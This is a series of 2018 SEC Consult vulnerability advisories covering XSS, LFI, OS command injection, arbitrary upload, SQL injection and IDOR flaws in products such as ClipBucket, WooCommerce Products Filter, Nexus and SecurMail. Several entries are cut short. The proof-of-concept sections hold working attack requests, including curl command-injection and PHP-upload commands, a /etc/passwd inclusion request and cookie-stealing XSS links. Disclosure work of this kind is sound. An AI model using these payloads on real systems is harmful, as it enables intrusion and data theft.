2. A component in the web server (the Oracle Webgate) answers this request with a redirect to the OAM. An encrypted message ("encquery") is passed to the OAM in a URL parameter.
3. The user authenticates against the OAM (e.g. with username and password).
4. The OAM redirects the user back to the web server. Information about the successful login is passed in the parameter "encreply".
5. The web server redirects the user to the resource that was initially requested. An encrypted authentication token is stored in a cookie (OAMAuthnCookie).
6. The authentication token in the OAMAuthnCookie cookie is used from now on to authenticate the user.

All three encrypted messages (encquery, encreply, OAMAuthnCookie) are encrypted with a CBC cipher using the same key. This key is shared between the OAM and the web server.

The attack exploits step 2 of the authentication process: the attacker sends manipulated "encquery" parameters and observes the server's response.
The following shows an example of a decrypted encquery:

salt=sF/vMVV0Gkr/k+IhbrXYWg==
wh=agentid
wu=%2F
wo=1
rh=http://server:
ru=%2F
reqtime=151000
ctx=
validate=

where
* the "salt" is a randomly generated value
* "validate" is a hash over certain parts of the message (MD5)

To conduct a padding oracle attack, an attacker would modify the second last encrypted block of an encrypted message. Most of the time, this causes the padding in the decrypted message to be invalid. In case the padding is accepted, the attacker gains information about the p
SEC Consult SA-20180424-0 :: Reflected Cross-Site Scripting in multiple Zyxel ZyWALL products
SEC Consult Vulnerability Lab Security Advisory < 20180424-0 >
===
title: Reflected Cross-Site Scripting
product: Zyxel ZyWALL: see "Vulnerable / tested version"
vulnerable version: ZLD 4.30 and before
fixed version: ZLD 4.31
CVE number: -
impact: Medium
homepage: https://www.zyxel.com
found: 2018-02-05
by: T. Weber (Office Vienna)

SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Focused on innovation and customer-centricity, Zyxel Communications Corp. has been connecting people to the internet for nearly 30 years. We keep promoting creativity which meets the needs of customers. This spirit has never been changed since we developed the world's first integrated 3-in-1 data/fax/voice modem in 1992. Our ability to adapt and innovate with networking technology places us at the forefront of understanding connectivity for telco/service providers, businesses and home users. We're building the networks of tomorrow, helping unlock the world's potential and meeting the needs of the modern workplace; powering people at work, life and play. We stand side-by-side with our customers and partners to share new approaches to networking that will unleash their abilities. Loyal friend, powerful ally, reliable resource — we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml

Business recommendation:
SEC Consult recommends Zyxel customers to upgrade the firmware to the latest version available. A thorough security review should be performed by security professionals to identify further potential security issues.

Vulnerability overview/description:
---
1) Reflected Cross-Site Scripting (XSS)
A reflected cross-site scripting vulnerability was identified in 'free_time_failed.cgi' in the admin interface. The parameter 'err_msg' is returned without any sanitization of the input.
An attacker, for example, can exploit this vulnerability to steal cookies from the attacked user in order to hijack a session and gain access to the device.

Proof of concept:
-
1) Reflected Cross-Site Scripting (XSS)
By opening the following link, the contents of the 'arip' and 'zy_pc_browser' cookies will be displayed.

http:///free_time_failed.cgi?err_msg=alert(document.cookie);
https:///free_time_failed.cgi?err_msg=alert(document.cookie);

Vulnerable / tested versions:
-
The following versions are affected:
Zyxel ZyWall USG 110 ZLD 4.30 and earlier
Zyxel ZyWall USG 210 ZLD 4.30 and earlier
Zyxel ZyWall USG 310 ZLD 4.30 and earlier
Zyxel ZyWall USG 1100 ZLD 4.30 and earlier
Zyxel ZyWall USG 1900 ZLD 4.30 and earlier
Zyxel ZyWall USG 2200-VPN ZLD 4.30 and earlier

Vendor contact timeline:
2018-02-07: Contacting vendor through secur...@zyxel.com.tw
2018-02-08: Vendor responded with contact information and a PGP key. Sent the encrypted advisory to the contact.
2018-02-09: Contact confirmed that the advisory was received.
2018-02-16: Contact confirmed the vulnerability and stated that the ZyWALL series is vulnerable to the reported vulnerability. The contact also stated that the vulnerability will be fixed by the end of March. Requested more information regarding version numbers and other affected devices.
2018-02-23: Contact confirmed that the devices are vulnerable in firmware version 4.30 and before.
2018-03-21: Contact informed us that the new firmware version will be ZLD 4.31 and that it will be released on 2018-04-17. Shifted release of advisory to 2018-04-17.
2018-04-12: Informed the contact that the advisory will be released in a few days.
2018-04-17: Asked the vendor if ZLD 4.31 was released. Didn't find the new version on the customer portal. E-mail was blocked and returned.
2018-04-18: Found the new version (ZLD 4.31) on the customer portal.
2018-04-24: Advisory release.

Solution:
-
Install firmware version ZLD 4.31 from the vendor's website to fix this issue:
https://www.zyxel.com/support/download_landing.shtml

Workaround:
---
Restrict network access to the device.

Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
SEC Consult SA-20180423-0 :: Multiple Stored XSS Vulnerabilities in WSO2 Carbon and Dashboard Server
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
===
title: Multiple Stored XSS Vulnerabilities
product: WSO2 Carbon, WSO2 Dashboard Server
vulnerable version: WSO2 Identity Server 5.3.0
fixed version: WSO2 Identity Server 5.5.0
CVE number: CVE-2018-8716
impact: high
homepage: https://wso2.com/products/dashboard
found: 2017-12-13
by: W. Schober (Office Vienna)

SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"WSO2 Carbon redefines middleware by providing an integrated and componentized middleware platform that adapts to the specific needs of any enterprise IT project - on premise or in the cloud. 100% open source and standards-based, WSO2 Carbon enables developers to rapidly orchestrate business processes, compose applications and develop services using WSO2 Developer Studio and a broad range of business and technical services that integrate with legacy, packaged and SaaS applications. The lean, complete, OSGi-based platform includes more than 175 components – OSGi bundles or Carbon features. The WSO2 Carbon core framework functions as “Eclipse for servers” and includes common capabilities shared by all WSO2 products, such as built-in registry, user management, transports, security, logging, clustering, caching and throttling services, co-ordination, and a GUI framework."

Source: https://wso2.com/products/carbon/

"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to rapidly create visually appealing and engaging web components such as dashboards, and gadgets, and unlocking data for business intelligence and monitoring. With the host of capabilities that Dashboard Server provides out-of-the-box, going from data to screen has never been easier."

Source: https://wso2.com/products/dashboard-server/

Business recommendation:
SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues.

Vulnerability overview/description:
---
1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
The dashboard is used by the end-users to manage their accounts, change passwords, alter their profiles, or change certain settings. An attacker is able to inject arbitrary JavaScript payloads into various textboxes (username, home address, lastname, firstname, etc). The payloads are permanently stored in the dashboard and triggered every time the dashboard is visited. The payload is also potentially triggered in the carbon part of WSO2, which means that an attacker would be able to inject payloads from the front-end application into a middleware application, which is not accessible from the internet, and attack administrators.

2) Stored Cross-Site Scripting in WSO2 Carbon
The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker host URL an arbitrary JavaScript payload can be injected and permanently stored in the web application.

Proof of concept:
-
1) Stored Cross-Site Scripting in WSO2 Dashboard
The following input fields are vulnerable and JavaScript payloads can be directly injected:
- Firstname
- Lastname
- Username
- Address

It is suspected that all user inputs are returned unfiltered in all server responses.

2) Stored Cross-Site Scripting in WSO2 Carbon
To demonstrate the vulnerability, it is sufficient to add a new BPS worker and set the URL to the following payload:

">

Every time the carbon middleware application is accessed, the payload is triggered.

Vulnerable / tested versions:
-
The following version has been tested which was the most recent version at the time of discovery:
* WSO2IS 5.3.0

Vendor contact timeline:
2018-01-25: Contacting vendor through secur...@wso2.com
2018-02-08: Asking for status update. Vendor responds that they are still investigating the issue.
2018-02-21: Vendor responds with release date and further details concerning the nature of the vulnerabilities. The XSS in the Carbon component was a duplicate and should be already fixed. Concerning the XSS in the dashboard a fix is implemented and will be rolled out with the release of WSO2 Identity Server 5.5.0.
2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard.
2018-03-15: Mitre assigned CVE-2018-8716.
2018-03-26: Vendor informed us that the final release of the updated software will be o
SEC Consult SA-20180314-0 :: Arbitrary Shortcode Execution & Local File Inclusion in WooCommerce Products Filter (PluginUs.Net)
SEC Consult Vulnerability Lab Security Advisory < 20180314-0 >
===
title: Arbitrary Shortcode Execution & Local File Inclusion
product: WOOF - WooCommerce Products Filter (PluginUs.Net)
vulnerable version: 1.1.9
fixed version: 2.2.0
CVE number: (requested but not yet received)
impact: Critical
homepage: https://pluginus.net/
found: 2018-02-20
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)

SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"PluginUs.Net is a little team of talented professionals from Ukraine. Unlike most of the big companies on the net, we believe in individual approach to every our customer. Web development is our passion and we always try to go an extra mile over our clients' expectations. Our team specializes in development of WordPress plugins. It's always exciting to try new technologies and approaches to get the project done and impress clients by realization of their ideas!"

Source: https://pluginus.net/about-us/

Business recommendation:
SEC Consult recommends to upgrade to the latest version available as soon as possible. Further detailed security tests should be performed in order to identify potential other security issues.

Vulnerability overview/description:
---
1. Arbitrary Shortcode Execution
The plugin implemented a page redraw AJAX function accessible to anyone without any authentication. WordPress shortcode markup in the "shortcode" parameter is evaluated. Normally unauthenticated users can't evaluate shortcodes as they are often sensitive. Additionally, it is noted that there are other shortcodes implemented and used in this plugin which can be abused through the same attack. Worse, some of them could lead to remote code execution.

2. Local File Inclusion
The vulnerability is due to the lack of args/input validation on render_html before allowing it to be called by extract(), a PHP built-in function.
Because of this, the supplied args/input can be used to overwrite the $pagepath variable, which then could lead to a local file inclusion attack.

Proof of concept:
-
1. Arbitrary Shortcode Execution
The parameter "shortcode" within the "admin-ajax.php" script is affected by the code execution vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
[...]

action=woof_redraw_woof=<>

2. Local File Inclusion
The parameter "shortcode" within the "admin-ajax.php" script is affected by the local file inclusion vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
[...]

action=woof_redraw_woof=woof_search_options
pagepath=/etc/passwd

Vulnerable / tested versions:
-
PluginUs.Net WooCommerce Products Filter version 1.1.9 has been tested and found to be vulnerable.

Vendor contact timeline:
2018-02-20: Contacting vendor through realmag...@gmail.com
2018-02-20: Vendor agreed to proceed without encrypted channel
2018-02-21: Sent security advisory to vendor
2018-02-26: Vendor sent patch containing the fixes
2018-02-26: Informed vendor the patch doesn't fully mitigate the vulnerability
2018-03-12: Request update from vendor
2018-03-12: Vendor said they already published the patch
2018-03-14: Public release of security advisory

Solution:
-
The vendor provides an updated version and users are urged to upgrade to version 2.2.0 immediately:
https://www.woocommerce-filter.com/update-woocommerce-products-filter-v-2-2-0/

Workaround:
---
None

Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
SEC Consult SA-20180312-0 :: Multiple Critical Vulnerabilities in SecurEnvoy SecurMail
SEC Consult Vulnerability Lab Security Advisory < 20180312-0 >
===
title: Multiple Critical Vulnerabilities
product: SecurEnvoy SecurMail
vulnerable version: 9.1.501
fixed version: 9.2.501 or hotfix patch "1_012018"
CVE number: CVE-2018-7701, CVE-2018-7702, CVE-2018-7703, CVE-2018-7704, CVE-2018-7705, CVE-2018-7706, CVE-2018-7707
impact: Critical
homepage: https://www.securenvoy.com/
found: 2017-11
by: W. Ettlinger (Office Vienna)

SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Sending and receiving encrypted emails is not an easy or simple experience. Businesses rely on email with an increasing amount of sensitive data sent across their networks. A revolutionary approach that doesn't suffer from the overheads of deployment and encryption management; just rock-solid security to give you 100% confidence in your business communications."

URL: https://www.securenvoy.com/products/securmail/key-features.shtm

Business recommendation:
During a brief crash test of the SecurEnvoy SecurMail application several severe vulnerabilities have been identified that break the core security promises of the product. These vulnerabilities open the possibility for several different attack scenarios that allow an attacker to read other users' encrypted e-mails and overwrite or delete e-mails stored in other users' inboxes.

As we have identified several critical vulnerabilities within a very short time frame we expect numerous other vulnerabilities to be present. As other SecurEnvoy products (besides the analyzed SecurMail) appear to be highly integrated (all products are installed with a single setup file) we suspect other components to also suffer from severe security deficits.

We recommend not to use SecurEnvoy products (especially SecurMail) in a production environment until:
* a comprehensive security audit has been performed and
* state of the art security mechanisms have been adopted.

Vulnerability overview/description:
---
1) Cross Site Scripting (CVE-2018-7703, CVE-2018-7707)
SEC Consult did not find any functionality that encodes user input when creating HTML pages. Therefore persistent and reflected cross site scripting attacks are possible throughout the application.

Some pages fail to properly decode URL encoded parameters. Because of this, cross site scripting cannot be exploited on these pages in most browsers.

2) Path Traversal (CVE-2018-7705, CVE-2018-7706)
SEC Consult did not find any path traversal checks throughout the application. Since the application uses encrypted files as the primary method of data storage, this vulnerability can be exploited at several points. Using this vulnerability, a legitimate recipient can read mails sent to other recipients in plain text!

3) Insecure Direct Object Reference (CVE-2018-7704)
Authorization checks are only partially implemented. This allows a legitimate recipient to read mails sent to other users in plain text.

4) Missing Authentication and Authorization (CVE-2018-7702)
In order to send encrypted e-mails a client does not need to authenticate on the SecurEnvoy server. Therefore anyone with network access to the server can arbitrarily send e-mails that appear to come from an arbitrary sender address.

Moreover, an attacker with network access to the server can re-send previous communication to arbitrary recipients. This allows him/her to extract all e-mails stored on the server. An attacker could also modify arbitrary messages stored on the server.

5) Cross Site Request Forgery (CVE-2018-7701)
SEC Consult did not find any protection against cross site request forgery. An attacker could use this vulnerability to delete a victim's e-mail or to impersonate the victim and reply to his/her e-mails.

Since these vulnerabilities were found during a very short time frame, SEC Consult believes that the product may contain a large number of other security vulnerabilities. As already several core security promises have been broken during this short crash test, no further tests were conducted.

Proof of concept:
-
1) Cross Site Scripting
a) The following HTML fragment demonstrates reflected cross site scripting (CVE-2018-7703):

--- snip ---

--- snip ---

b) E-mails that are sent using the HTML format can contain any
SEC Consult SA-20180228-0 :: Insecure Direct Object Reference vulnerability in TestLink Open Source Test Management
SEC Consult Vulnerability Lab Security Advisory < 20180228-0 >
===
title: Insecure Direct Object Reference
product: TestLink Open Source Test Management
vulnerable version: <1.9.17
fixed version: 1.9.17 (after November 2017), and the current "testlink_1_9" branch
CVE number: -
impact: Medium
homepage: http://testlink.org/
found: 2017-09-22
by: T. Weber (Office Vienna)

SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"TestLink is a web based test management and test execution system. It enables quality assurance teams to create and manage their test cases as well as to organize them into test plans. These test plans allow team members to execute test cases and track test results dynamically."

Source: https://github.com/TestLinkOpenSourceTRMS/testlink-code

Business recommendation:
SEC Consult advises to immediately install the available updates as attackers might gain access to sensitive data belonging to other users. A thorough security review performed by security professionals is highly recommended in order to identify potential further security deficiencies.

Vulnerability overview/description:
---
1) Insecure Direct Object Reference
An unauthenticated user can gain access to referenced files which are produced by different test cases. By using a simple ID iterator, all produced output data can be gathered from the whole system. The actual impact strongly depends on the classification of the produced data which is referenced. Therefore, the risk can vary from low to critical depending on the use case.

Proof of concept:
-
1) Insecure Direct Object Reference
An unauthenticated attacker can download data from the TestLink environment by using the following URL:

http:///lib/attachments/attachmentdownload.php?skipCheck=1=

The tag specifies the target address and can also include a sub-folder where the hosted TestLink application is located.

Vulnerable / tested versions:
-
The following versions have been tested and are vulnerable. It is assumed that older versions are affected as well, e.g.:
* 1.9.16
* 1.9.15
* 1.9.14

Vendor contact timeline:
2017-10-18: Contacting vendor through http://mantis.testlink.org. Vendor requested the information.
2017-10-19: Asked if the advisory should be uploaded to mantis directly.
2017-10-21: Contact agreed.
2017-10-23: Uploaded the advisory to mantis.
2017-11-01: Contact provided a fix for 1.9.16. Fixes will be created for 1.9.15 and 1.9.14 too. Vendor asked us for verification.
2017-11-07: Stated that verification is not possible at the moment (no test instance) and that it can be verified easily with the PoC.
2018-01-09: Asked for status update; no answer.
2018-01-29: Asked for status update; no answer.
2018-02-16: Asked for status update.
2018-02-17: Vendor responded that we can re-check the fix or release the advisory.
2018-02-19: Asked the vendor for a reachable test instance; reply: there is no test instance.
2018-02-28: Public release of security advisory

Solution:
-
Check out the current testlink-code on branch "testlink_1_9":
https://github.com/TestLinkOpenSourceTRMS/testlink-code/tree/testlink_1_9/

The following commit contains the fix since 2017-11-01:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/d5ffdb7634e43ba352e9567333682b6436cfb43d

Upgrade to 1.9.17 (after November 2017).

Workaround:
---
Restrict network access and do not expose the TestLink interface to the internet.
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
SEC Consult SA-20180227-0 :: OS command injection, arbitrary file upload & SQL injection in ClipBucket
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
===
title: OS command injection, arbitrary file upload & SQL injection
product: ClipBucket
vulnerable version: <4.0.0 - Release 4902
fixed version: 4.0.0 - Release 4902
CVE number: -
impact: critical
homepage: http://clipbucket.com/
found: 2017-09-06
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
    Wan Ikram (Office Kuala Lumpur)
    Fikri Fadzil (Office Kuala Lumpur)
    Jasveer Singh (Office Kuala Lumpur)

SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"ClipBucket is a free and open source software which helps us to create a complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu in few minutes of setup. It was first created in 2007 by Arslan Hassan and his team of developers. ClipBucket was developed as a YouTube clone but has been upgraded with advanced features and enhancements. It uses FFMPEG for video conversion and thumbs generation which is the most widely used application so, users can stream it straight away using the Video JS and HTML 5 Players."

Source: https://clipbucket.com/about

Business recommendation:
By exploiting the vulnerabilities documented in this advisory, an attacker can fully compromise the web server which has ClipBucket installed. Potentially sensitive data might get exposed through this attack. Users are advised to immediately install the patched version provided by the vendor.

Vulnerability overview/description:
---
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a serious vulnerability as the chances for the system to be fully compromised are very high. This same vulnerability can also be exploited by authenticated attackers with normal user privileges.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded to the webserver by an unauthenticated attacker. It is possible for an attacker to upload a script to issue operating system commands. This same vulnerability can also be exploited by an authenticated attacker with normal user privileges.

3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute arbitrary SQL commands on the underlying MySQL server.

Proof of concept:
-
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability by manipulating the "file_name" parameter during the file upload in the script /api/file_uploader.php:

$ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<>" http://$HOST/api/file_uploader.php

Alternatively, this vulnerability can also be exploited by authenticated basic privileged users with the following payload by exploiting the same issue in /actions/file_downloader.php:

$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4_name=abc || <>" "http://$HOST/actions/file_downloader.php;

2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no authentication required.

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" "http://$HOST/actions/beats_uploader.php;
$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php" "http://$HOST/actions/photo_uploader.php;

Furthermore, this vulnerability is also available to authenticated users with basic privileges:

$ curl --cookie "[--SNIP--]" -F "coverPhoto=@valid-image-with-appended-phpcode.php" "http://$HOST/edit_account.php?mode=avatar_bg;

3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against unauthenticated blind SQL injection.

URL     : http://$HOST/actions/vote_channel.php
METHOD  : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(1, rand())

The source code excerpt below shows the vulnerable code:

VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery->login_check('',true)){
if($vote == "yes"){
$query = "UPDATE " . tbl("users") . " SET
SEC Consult SA-20180221-0 :: Hijacking of arbitrary miSafes Mi-Cam video baby monitors
We have published an accompanying blog post to this technical advisory with further information: https://www.sec-consult.com/en/blog/2018/02/internet-of-babies-when-baby-monitors-fail-to-be-smart/index.html SEC Consult Vulnerability Lab Security Advisory < 20180221-0 > === title: Hijacking of arbitrary video baby monitors product: miSafes Mi-Cam remote video monitor vulnerable version: Android application v1.2.0, iOS v1.0.5 Firmware v1.0.38 fixed version: - CVE number: - impact: critical homepage: http://www.misafes.com/mi-cam found: 2017-11-30 by: Mathias Frank (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal Moscow - Munich - Kuala Lumpur - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Mi-CamHD, Wi-Fi remote video monitor for everyone; 720P HD quality video, easy set up & use, two-way talk and supports free local video recording, all can be use by our user friendly Mi-Cam app." Source: http://www.misafes.com/mi-cam Business recommendation: SEC Consult recommends not to use this device until a thorough security review has been performed by security professionals and all identified issues have been resolved! Although cloud-connected hardware may have an advantage regarding usability and convenience for users, if security is lacking those products pose a great risk for all customers. Furthermore, it seems there exist similar products from other vendors, e.g. "Qihoo 360 Smart Home Camera", that look exactly the same and may also be affected but SEC Consult could not verify this. The cloud component hosted by "qiwocloud2.com" may be used by other products as well. Additional information regarding other vendors are described in our blog post linked at the top of this advisory. 
Vulnerability overview/description:
---
The usage of the Mi-Cam video baby monitor and its Android (or iOS) application involves numerous requests to a cloud infrastructure available at ipcam.qiwocloud2.com with the aim of communicating with the video baby monitor or the respective Android application. The Android application has at least 5-10 installations according to the Google Play Store, with potentially as many iOS users as well. SEC Consult has identified multiple critical security issues within this product.

1) Broken Session Management & Insecure Direct Object References
The usage of the Android application "Mi-Cam" and the interaction with the video baby monitor involves several different API calls. A number of critical API calls can be accessed by an attacker with arbitrary session tokens because of broken session management. This allows an attacker to retrieve information about the supplied account and its connected video baby monitors. Information retrieved by this feature is sufficient to view and interact with all connected video baby monitors for the supplied UID.

2) Missing Password Change Verification Code Invalidation
The password forget functionality sends a 6-digit validation key, which is valid for 30 minutes, to the supplied email address in order to set a new password. Multiple codes can be requested, though, while previously delivered codes do not get invalidated, and any one of them can be used as a valid key. This can easily be brute-forced to take over other accounts.

3) Available Serial Interface
The PCB of the video baby monitor holds an unlabeled UART interface where an attacker is able to get hardware-level access to the device and, for instance, extract the firmware for further analysis. SEC Consult identified further security issues such as outdated software (issue 6) or weak passwords (issue 4) by analyzing the firmware using IoT Inspector (https://www.iot-inspector.com).
4) Weak Default Credentials
The "root" user available on the video baby monitor uses very weak default credentials with only 4 digits.

5) Enumeration of user accounts
The password reset functionality leaks information about the existence of supplied user accounts, which can aid in further (brute-force) attacks.

6) Outdated and Vulnerable Software
Several software components which are affected by publicly known vulnerabilities were identified in the firmware of the video baby monitor.

Proof of concept:
-
As the vendor could not be reached in order to get the issues fixed we will omit detailed proof of concept information in this advisory.

1) Broke
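Issue 2 above (codes that stay valid until their 30-minute expiry even after newer ones were requested) is a server-side state problem. The following is an added example, not vendor code, that models the described behaviour next to a hardened reset-code store: a new request replaces the old code, the code is single use, guesses are limited, and the comparison is constant time. Class names, the attempt limit and the demo code sequence are constructed assumptions.

```python
"""Password-reset code handling: the behaviour described for the Mi-Cam cloud
(every code ever sent stays valid for its 30-minute lifetime) next to a hardened
store. Added example, not vendor code; all names here are hypothetical."""
import hmac
import secrets
from dataclasses import dataclass

CODE_TTL_SECONDS = 30 * 60   # the 30-minute validity stated in the advisory
MAX_ATTEMPTS = 5             # assumed lockout threshold, not from the advisory


def generate_code() -> str:
    """6-digit code from a CSPRNG, zero-padded."""
    return f"{secrets.randbelow(10 ** 6):06d}"


@dataclass
class IssuedCode:
    code: str
    issued_at: float
    attempts: int = 0

    def expired(self, now: float) -> bool:
        return now - self.issued_at > CODE_TTL_SECONDS


class WeakResetStore:
    """Models the flaw: codes accumulate per account and any of them verifies."""

    def __init__(self, gen=generate_code):
        self._gen = gen
        self._codes = {}            # email -> list[IssuedCode]

    def request(self, email: str, now: float) -> str:
        code = self._gen()
        self._codes.setdefault(email, []).append(IssuedCode(code, now))
        return code

    def verify(self, email: str, candidate: str, now: float) -> bool:
        return any(not c.expired(now) and c.code == candidate
                   for c in self._codes.get(email, []))


class HardenedResetStore:
    """A new request replaces the previous code; a code is single-use,
    attempt-limited and compared in constant time."""

    def __init__(self, gen=generate_code):
        self._gen = gen
        self._codes = {}            # email -> IssuedCode

    def request(self, email: str, now: float) -> str:
        code = self._gen()
        self._codes[email] = IssuedCode(code, now)   # earlier codes are gone
        return code

    def verify(self, email: str, candidate: str, now: float) -> bool:
        issued = self._codes.get(email)
        if issued is None:
            return False
        if issued.expired(now) or issued.attempts >= MAX_ATTEMPTS:
            del self._codes[email]                    # burn it either way
            return False
        issued.attempts += 1
        # compare_digest needs ASCII str; codes are digits only
        if hmac.compare_digest(issued.code, candidate):
            del self._codes[email]                    # single use
            return True
        return False


def _demo_codes():
    """Constructed, deterministic code sequence so the demo is repeatable."""
    yield from ("111111", "222222", "333333", "444444")


def demo(store_cls) -> dict:
    """Exercise one store with the constructed codes and report what it accepts."""
    store = store_cls(gen=_demo_codes().__next__)
    user, t0 = "victim@example.invalid", 1_700_000_000.0
    first = store.request(user, t0)
    store.request(user, t0 + 60)
    latest = store.request(user, t0 + 120)
    results = {
        "stale_code_accepted": store.verify(user, first, t0 + 180),
        "latest_code_accepted": store.verify(user, latest, t0 + 180),
        "replayed_code_accepted": store.verify(user, latest, t0 + 200),
    }
    fresh = store.request(user, t0 + 300)
    for guess in range(MAX_ATTEMPTS):             # wrong guesses, then the real code
        store.verify(user, f"{guess:06d}", t0 + 301)
    results["code_accepted_after_lockout"] = store.verify(user, fresh, t0 + 302)
    results["expired_code_accepted"] = store.verify(
        user, fresh, t0 + 300 + CODE_TTL_SECONDS + 1)
    return results
```

`demo(WeakResetStore)` accepts the stale, the replayed and the post-lockout code; `demo(HardenedResetStore)` accepts only the most recent code, once. The attempt counter is what turns a 6-digit space from brute-forceable into a non-issue, and the replacement on request is what the advisory reports as missing.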
SEC Consult SA-20180208-0 :: Multiple Cross-Site Scripting Vulnerabilities in Sonatype Nexus Repository Manager OSS/Pro
SEC Consult Vulnerability Lab Security Advisory < 20180208-0 >
===
title: Multiple Cross-Site Scripting Vulnerabilities
product: Sonatype Nexus Repository Manager OSS/Pro
vulnerable version: <=2.14.5, <=3.7.1
fixed version: 2.14.6, 3.8.0
CVE number: CVE-2018-5306, CVE-2018-5307
impact: Medium
homepage: https://www.sonatype.com/
found: 2017-12-12
by: Werner Schober, Daniel Ostovary (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===

Vendor description:
---
"At Sonatype we have a long history of partnership with the world of open source software development. From our humble beginning as core contributors to Apache Maven, to supporting the world’s largest repository of open source components (Central), to distributing the world's most popular repository manager (Nexus), we exist for one simple reason; to help accelerate software innovation."
Source: https://www.sonatype.com/about-sonatype

Business recommendation:
The Sonatype Nexus Repository Server is affected by multiple XSS vulnerabilities which could be used by an attacker to execute JavaScript code in the user's browser. The vendor provides a patch for both version 2 and 3 of the product, which should be installed immediately. It is recommended to conduct a thorough security review by IT security professionals in order to identify potential other security issues.

Vulnerability overview/description:
---
1) Reflected XSS vulnerability
The parameters "repoId" and "format" of the "healthCheckFileDetail" function are vulnerable to reflected XSS. If the attacker can lure a user into clicking a crafted link, he could execute arbitrary JavaScript code. In case the user has sufficient permissions, an attacker can create arbitrary (administrative) users or perform stored XSS attacks (see 2).
2) Stored XSS vulnerabilities
The application is vulnerable to multiple stored XSS vulnerabilities, which are described in the following list.

2.1) The first one is located in the "File Upload" functionality of the "Staging Upload". Uploading a file with JavaScript code in its name allows storing JavaScript code, which gets triggered every time the file name is shown (e.g. in "Repositories").

2.2) The second stored XSS vulnerability is more precisely considered a stored DOM injection. This vulnerability affects the functionality of creating a new user. When doing so it is possible to inject JavaScript/HTML code into the username, which later gets rendered/executed every time the username is displayed.

2.3) The third stored XSS vulnerability is also a stored DOM injection. It affects the "IQ Server Connection"/"IQ Server Dashboard" functionality. The "IQ Server URL" field in the "IQ Server Connection" allows injecting JavaScript/HTML code into the menu bulletpoint "IQ Server Dashboard".

The vendor provided the following CVE numbers:
* CVE-2018-5306 - covers the XSS vulnerabilities in Nexus 3
* CVE-2018-5307 - covers the XSS vulnerabilities in Nexus 2

Proof of concept:
-
1) Reflected XSS vulnerability
By luring a user into clicking the following link, an arbitrary JavaScript payload will be executed:
https://example.com/nexus/service/siesta/healthcheck/healthCheckFileDetail/.../index.html?repoId=public=sectest

Vulnerable parameters:
-) repoId
-) format

2) Stored XSS vulnerabilities
***Please note that only users with access to the respective functionalities are susceptible to the following stored XSS vulnerabilities.***

2.1) The staging upload allows an attacker to upload a file which contains a JavaScript payload in the filename. An example for a filename containing a "malicious" payload is as follows:
".jpg"
This file can be uploaded flawlessly and every time the filename is displayed, the JavaScript payload gets executed.
2.2) An attacker is able to create a new user which contains a malicious JavaScript payload in the username. As an example the following username can be used:
"EvilAdmin Create Repository -> Access repository via "Repositories" -> JavaScript code is being executed)

2.3) The Nexus server allows setting up an IQ server connection. The server name is not validated and therefore allows the permanent injection of JavaScript code. To demonstrate the vulnerability
SEC Consult SA-20180207-0 :: Multiple buffer overflow vulnerabilities in InfoZip UnZip
SEC Consult Vulnerability Lab Security Advisory < 20180207-0 >
===
title: Multiple buffer overflow vulnerabilities
product: InfoZip UnZip
vulnerable version: UnZip <= 6.00 / UnZip <= 6.1c22
fixed version: 6.10c23
CVE number: CVE-2018-131,CVE-2018-132,CVE-2018-133
CVE-2018-134,CVE-2018-135
impact: high
